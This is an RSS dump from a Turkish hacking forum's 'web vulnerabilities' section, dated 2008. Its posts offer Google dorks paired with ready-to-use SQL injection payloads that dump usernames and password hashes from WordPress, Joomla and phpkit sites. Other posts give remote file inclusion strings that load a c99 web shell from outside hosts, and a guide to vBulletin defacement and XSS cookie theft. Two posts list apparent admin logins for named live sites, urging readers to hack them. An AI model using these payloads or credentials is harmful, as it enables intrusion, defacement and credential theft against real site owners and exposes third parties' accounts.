WEB-GÜVENLİK AÇIKLARI http://hackingteam.forummotion.com/web-guvenlyk-aciklari-f6/-t1.htm Web sitelerinde veya sunucularda bulunan açıklardan yararlanarak yapılan hack işlemlerini bu bölümde paylaşıma sunabilirsiniz...hedef site ve rastgele sitelere karşı nasıl açıklar aranmalıdır veya hangi yöntemlerle açıklardan yararlanılır bu bölümde geniş çaplı anlatımları yer alır....paylaşımlarınızda geçerlilik ve paylaşımların kanıtlanabilir doğruluğuna dikkat etmeniz rica olunur...... Fri, 05 Sep 2008 18:54:32 GMT 10 WEB-GÜVENLİK AÇIKLARI http://hitskin.com/themes/13/42/75/i_logo.jpg http://hackingteam.forummotion.com/web-guvenlyk-aciklari-f6/-t1.htm OsCommerce Açığı http://hackingteam.forummotion.com/web-guvenlyk-aciklari-f6/oscommerce-acyoy-t82.htm hackcoder
http://rapidshare.de/files/39306854/osCommerce.rar.html

http://s3.dosya.cc/osCommerce.rar.html

http://ultrashare.net/hosting/fl/da5a53cdd2/osCommerce

alıntıdır]]> WEB-GÜVENLİK AÇIKLARI Fri, 05 Sep 2008 18:54:32 GMT http://hackingteam.forummotion.com/web-guvenlyk-aciklari-f6/oscommerce-acyoy-t82.htm#127 http://hackingteam.forummotion.com/web-guvenlyk-aciklari-f6/oscommerce-acyoy-t82.htm ziyaretçi defteri açığı http://hackingteam.forummotion.com/web-guvenlyk-aciklari-f6/ziyaretci-defteri-acyoy-t81.htm hackcoder Arama kodu ; MyDesign Ziyaretci Defteri v1.4 Sonuna Eklencek Kod : yonetim.asp merhaba arkadaşlar bu video yeni başlayanlar için eğitim amaclıdır... acıgımız ziyaretci defteri =) google arama kodumuz : MyDesign Ziyaretci Defteri v1.4 sonuna eklenecek kod: yonetim.asp şimdi google.com'a girip arama yapalım.. kurban sitemiz daha önce hacklenmiş biz bu nun üstüne adımızı yazalım... http://www.kumsalradyo.com/ziyaretcidefteri/yonetim.asp - 4k aramalar ... WEB-GÜVENLİK AÇIKLARI Fri, 05 Sep 2008 18:53:26 GMT http://hackingteam.forummotion.com/web-guvenlyk-aciklari-f6/ziyaretci-defteri-acyoy-t81.htm#126 http://hackingteam.forummotion.com/web-guvenlyk-aciklari-f6/ziyaretci-defteri-acyoy-t81.htm SQL Injection http://hackingteam.forummotion.com/web-guvenlyk-aciklari-f6/sql-injection-t3.htm hackcoder
DORK 2 : allinurl: "wp-content/plugins/wordspew"

DORK 3 : allinurl: "wordspew/wordspew-rss.php"


EXPLOIT :

wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),concat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users]]> WEB-GÜVENLİK AÇIKLARI Thu, 04 Sep 2008 09:52:11 GMT http://hackingteam.forummotion.com/web-guvenlyk-aciklari-f6/sql-injection-t3.htm#3 http://hackingteam.forummotion.com/web-guvenlyk-aciklari-f6/sql-injection-t3.htm shell Google Araması: http://hackingteam.forummotion.com/web-guvenlyk-aciklari-f6/shell-google-aramasy-t18.htm hackcoder Google Araması: inurl:"com_htmlarea3_xtd-c" KOD: /components/com_htmlarea3_xtd-c/popups/ImageManager/config.i nc.php?mosConfig_absolute_path=http://adres.com/c99shell.txt ? ------------------------------------------------------------ ------------------------ Google Araması: inurl:"com_sitemap" KOD: /components/com_sitemap/sitemap.__xml.php?mosConfig_absolute_ p ath=http://adres.com/c99.txt? ------------------------------------------------------------ ... WEB-GÜVENLİK AÇIKLARI Thu, 04 Sep 2008 10:58:43 GMT http://hackingteam.forummotion.com/web-guvenlyk-aciklari-f6/shell-google-aramasy-t18.htm#23 http://hackingteam.forummotion.com/web-guvenlyk-aciklari-f6/shell-google-aramasy-t18.htm Vbulletin Site Deface Edin! http://hackingteam.forummotion.com/web-guvenlyk-aciklari-f6/vbulletin-site-deface-edin-t26.htm hackcoder Sizlere vBulletin Yeni Konu Açmada Html Kodlarının Açıklarıyla Site Deface Etmeyi Anlatıcam.İlk once www.Google.Com'a Giriyoruz. Kodumuzu Yazıyoruz. Kod: intext:"HTML code is On" inurl:showthread.php Yukarıda çıkan sitelerde html kodu açık burada dilediğniz kodları çalıştırabilirsiniz.Size tavsiyem XSS cookie çalma yöntemiyle admin olmanız gerçekten çok basit yani sadece showthread.php de açık ne işimize yarar demeyin açtığınız konuya koyarsınız kodu admin gelir. Kısacası ... WEB-GÜVENLİK AÇIKLARI Thu, 04 Sep 2008 11:48:37 GMT http://hackingteam.forummotion.com/web-guvenlyk-aciklari-f6/vbulletin-site-deface-edin-t26.htm#37 http://hackingteam.forummotion.com/web-guvenlyk-aciklari-f6/vbulletin-site-deface-edin-t26.htm bir açık daha http://hackingteam.forummotion.com/web-guvenlyk-aciklari-f6/bir-acyk-daha-t19.htm hackcoder Yeni Acık -------------------------------------------------------------------------------- Yeni acık cok site var tabi md5 kırabilirseniz DORK 1 : allinurl: id "com_jooget" DORK 2 : allinurl: detail "com_jooget" DORK 3 : allinurl: "com_jooget" EXPLOIT :index.php?option=com_jooget&Itemid=S@BUN&task=det ail&id=-1/**/union/**/select/**/0,333,0x3a,333,222,222,222,111,111,111,0,0,0,0,0,0 ,0,0,1,1,2,2,concat(username,0x3a,password)/**/from/**/jos_users/* WEB-GÜVENLİK AÇIKLARI Thu, 04 Sep 2008 10:59:18 GMT http://hackingteam.forummotion.com/web-guvenlyk-aciklari-f6/bir-acyk-daha-t19.htm#24 http://hackingteam.forummotion.com/web-guvenlyk-aciklari-f6/bir-acyk-daha-t19.htm bütün zone kayıt siteleri http://hackingteam.forummotion.com/web-guvenlyk-aciklari-f6/butun-zone-kayyt-siteleri-t16.htm hackcoder WEB-GÜVENLİK AÇIKLARI Thu, 04 Sep 2008 10:57:12 GMT http://hackingteam.forummotion.com/web-guvenlyk-aciklari-f6/butun-zone-kayyt-siteleri-t16.htm#21 http://hackingteam.forummotion.com/web-guvenlyk-aciklari-f6/butun-zone-kayyt-siteleri-t16.htm yönlendirme http://hackingteam.forummotion.com/web-guvenlyk-aciklari-f6/yonlendirme-t27.htm hackcoder

arkadaşlar bu kod yönledir me site hacklediniz mi index bunuda koyun google yerine hangi link yazarsanız ona yönlenir]]> WEB-GÜVENLİK AÇIKLARI Thu, 04 Sep 2008 11:53:58 GMT http://hackingteam.forummotion.com/web-guvenlyk-aciklari-f6/yonlendirme-t27.htm#39 http://hackingteam.forummotion.com/web-guvenlyk-aciklari-f6/yonlendirme-t27.htm site hacklemek isteyenler http://hackingteam.forummotion.com/web-guvenlyk-aciklari-f6/site-hacklemek-isteyenler-t14.htm hackcoder Google Araması: inurl:"com_flyspray" Site Sonuna: /components/com_flyspray/startdown.php?file=http://megaturks.by.ru/c99.txt? Google Araması: inurl:"com_admin" Site Sonuna: administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt? Google Araması: inurl:index.php?option=com_simpleboard Site Sonuna: /components/com_simpleboard/file_upload.php?sbp=http://megaturks.by.ru/c99.txt? Google ... WEB-GÜVENLİK AÇIKLARI Thu, 04 Sep 2008 10:55:10 GMT http://hackingteam.forummotion.com/web-guvenlyk-aciklari-f6/site-hacklemek-isteyenler-t14.htm#19 http://hackingteam.forummotion.com/web-guvenlyk-aciklari-f6/site-hacklemek-isteyenler-t14.htm arkadaşlar alın hackleyin daha iyi kavramış olursunuz bu işi http://hackingteam.forummotion.com/web-guvenlyk-aciklari-f6/arkadalar-alyn-hackleyin-daha-iyi-kavramy-olursunuz-bu-ii-t28.htm hackcoder www.umrum.com admin muuRnt3ong_3 secondlife.emvbusiness.com admin 661651123 www.selloff-vacations-now.com admin 2006ty instantadultcontent.com admin bcyber1 directory.corsopedia.com condor mecmar1979 gen-worldwide.com ramanean 6666666 WEB-GÜVENLİK AÇIKLARI Thu, 04 Sep 2008 12:06:59 GMT http://hackingteam.forummotion.com/web-guvenlyk-aciklari-f6/arkadalar-alyn-hackleyin-daha-iyi-kavramy-olursunuz-bu-ii-t28.htm#42 http://hackingteam.forummotion.com/web-guvenlyk-aciklari-f6/arkadalar-alyn-hackleyin-daha-iyi-kavramy-olursunuz-bu-ii-t28.htm alın hackleyin http://hackingteam.forummotion.com/web-guvenlyk-aciklari-f6/alyn-hackleyin-t17.htm hackcoder admin
snooker

directory.corsopedia.com
condor
mecmar1979

umrum.com
admin
muuRnt3ong_3]]> WEB-GÜVENLİK AÇIKLARI Thu, 04 Sep 2008 10:57:39 GMT http://hackingteam.forummotion.com/web-guvenlyk-aciklari-f6/alyn-hackleyin-t17.htm#22 http://hackingteam.forummotion.com/web-guvenlyk-aciklari-f6/alyn-hackleyin-t17.htm md5 kırmak için bütün siteler http://hackingteam.forummotion.com/web-guvenlyk-aciklari-f6/md5-kyrmak-icin-butun-siteler-t20.htm hackcoder http://www.milw0rm.com Gdataonline http://gdataonline.com/seekhash.php Securitystats http://www.securitystats.com/tools/hashcrack.php md5.rednoize http://md5.rednoize.com md5lookup http://www.md5lookup.com/?category=main&page=search md5crack.it http://md5crack.it-helpnet.de/index.php?op=entries http://c3rb3r.openwall.net/mdcrack/ Hashchecker http://www.hashchecker.com OpHCrack http://lasecwww.epfl.ch/~oechslin/projects/ophcrack/ Plain-Text http://www.plain-text.info md5lookup http://www.md5lookup.com/?category=main&page=search md5crack.it http://md5crack.it-helpnet.de/index.php?op=entries ... WEB-GÜVENLİK AÇIKLARI Thu, 04 Sep 2008 10:59:59 GMT http://hackingteam.forummotion.com/web-guvenlyk-aciklari-f6/md5-kyrmak-icin-butun-siteler-t20.htm#25 http://hackingteam.forummotion.com/web-guvenlyk-aciklari-f6/md5-kyrmak-icin-butun-siteler-t20.htm md5 nasıl alınır http://hackingteam.forummotion.com/web-guvenlyk-aciklari-f6/md5-nasyl-alynyr-t15.htm hackcoder hACKC0D3R HACKC0D3R ARAMA KODU include.php?path=forum/team.php SİTE SONUNA EKLENECEK KOD /include.php?path=faq/faq.php&catid=-1'%20UNION%20SELECT%201,2,3,4,user_name,user_pw,7 , 8,9,10,11,12,13%20FROM%20phpkit_user%20where%20%20 user_id=1%20and%20'1'='1 http://gdataonline.com/seekhash.php http://milw0rm.com/cracker/insert.php BU SİTELERDE KIRABİLİRSİNİZ DENEYELİM ///////////r3dc0d3r ... WEB-GÜVENLİK AÇIKLARI Thu, 04 Sep 2008 10:56:09 GMT http://hackingteam.forummotion.com/web-guvenlyk-aciklari-f6/md5-nasyl-alynyr-t15.htm#20 http://hackingteam.forummotion.com/web-guvenlyk-aciklari-f6/md5-nasyl-alynyr-t15.htm joomla SQL Injection(com_restaurant) http://hackingteam.forummotion.com/web-guvenlyk-aciklari-f6/joomla-sql-injectioncom_restaurant-t6.htm hackcoder
EXPLOIT :

index.php?option=com_restaurant&Itemid=S@BUN&func=detail&id=-1/**/union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,username/**/from/**/mos_users/*]]> WEB-GÜVENLİK AÇIKLARI Thu, 04 Sep 2008 09:56:26 GMT http://hackingteam.forummotion.com/web-guvenlyk-aciklari-f6/joomla-sql-injectioncom_restaurant-t6.htm#6 http://hackingteam.forummotion.com/web-guvenlyk-aciklari-f6/joomla-sql-injectioncom_restaurant-t6.htm (com_catalogshop) http://hackingteam.forummotion.com/web-guvenlyk-aciklari-f6/com_catalogshop-t7.htm hackcoder
EXPLOIT :

index.php?option=com_catalogshop&Itemid=S@BUN&func=detail&id=-1/**/union/**/select/**/null,null,concat(password),3,4,5,6,7,8,9,10,11,12,concat(username)/**/from/**/mos_users/*]]> WEB-GÜVENLİK AÇIKLARI Thu, 04 Sep 2008 10:00:48 GMT http://hackingteam.forummotion.com/web-guvenlyk-aciklari-f6/com_catalogshop-t7.htm#7 http://hackingteam.forummotion.com/web-guvenlyk-aciklari-f6/com_catalogshop-t7.htm joomla SQL Injection(com_neoreferences) http://hackingteam.forummotion.com/web-guvenlyk-aciklari-f6/joomla-sql-injectioncom_neoreferences-t5.htm hackcoder
EXPLOIT :

index.php?option=com_neoreferences&Itemid=27&catid=99887766/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*%20where%20user_id=1=1/*]]> WEB-GÜVENLİK AÇIKLARI Thu, 04 Sep 2008 09:55:22 GMT http://hackingteam.forummotion.com/web-guvenlyk-aciklari-f6/joomla-sql-injectioncom_neoreferences-t5.htm#5 http://hackingteam.forummotion.com/web-guvenlyk-aciklari-f6/joomla-sql-injectioncom_neoreferences-t5.htm joomla SQL Injection(com_sobi2) http://hackingteam.forummotion.com/web-guvenlyk-aciklari-f6/joomla-sql-injectioncom_sobi2-t4.htm hackcoder #

EXPLOIT :

http://site.com/path/index.php?option=com_sobi2&Itemid=27&catid=-99999/**/union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,username/**/from/**/mos_users/*]]> WEB-GÜVENLİK AÇIKLARI Thu, 04 Sep 2008 09:54:05 GMT http://hackingteam.forummotion.com/web-guvenlyk-aciklari-f6/joomla-sql-injectioncom_sobi2-t4.htm#4 http://hackingteam.forummotion.com/web-guvenlyk-aciklari-f6/joomla-sql-injectioncom_sobi2-t4.htm